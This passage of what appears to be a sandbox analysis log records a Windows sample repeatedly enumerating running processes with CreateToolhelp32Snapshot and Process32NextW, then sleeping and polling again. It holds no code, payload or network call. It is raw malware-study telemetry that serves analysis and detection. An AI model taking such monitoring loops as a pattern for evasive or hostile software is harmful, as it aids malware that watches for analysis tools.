pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.906] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.907] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.912] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.915] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.916] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.921] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.922] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 
[0110.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.924] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.932] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.933] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.934] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.935] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.936] CloseHandle (hObject=0xc4) returned 1 [0110.937] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0110.941] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.942] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.943] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.943] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.944] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.945] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.945] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.946] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.947] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.947] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.948] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.949] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.949] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.950] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.951] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.951] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.952] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.953] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.953] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.955] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.956] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.957] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.958] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.959] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.960] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.962] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.963] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.964] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.965] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.984] Process32NextW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.986] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.990] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.994] CloseHandle (hObject=0xbc) returned 1 [0110.994] Sleep (dwMilliseconds=0x12c) [0111.311] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0111.317] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.409] CloseHandle (hObject=0xc4) returned 1 [0111.409] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 
0xbc [0111.414] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.492] CloseHandle (hObject=0xbc) returned 1 [0111.492] Sleep (dwMilliseconds=0x12c) [0111.807] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0111.812] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.908] CloseHandle (hObject=0xc4) returned 1 [0111.909] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0111.913] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.045] CloseHandle (hObject=0xbc) returned 1 [0112.045] Sleep (dwMilliseconds=0x12c) [0112.350] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0112.354] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.473] CloseHandle (hObject=0xc4) returned 1 [0112.473] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0112.477] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, 
dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.669] CloseHandle (hObject=0xbc) returned 1 [0112.669] Sleep (dwMilliseconds=0x12c) [0112.992] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0112.997] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.053] CloseHandle (hObject=0xc4) returned 1 [0113.053] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0113.058] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.199] CloseHandle (hObject=0xbc) returned 1 [0113.199] Sleep (dwMilliseconds=0x12c) [0114.487] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0114.493] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 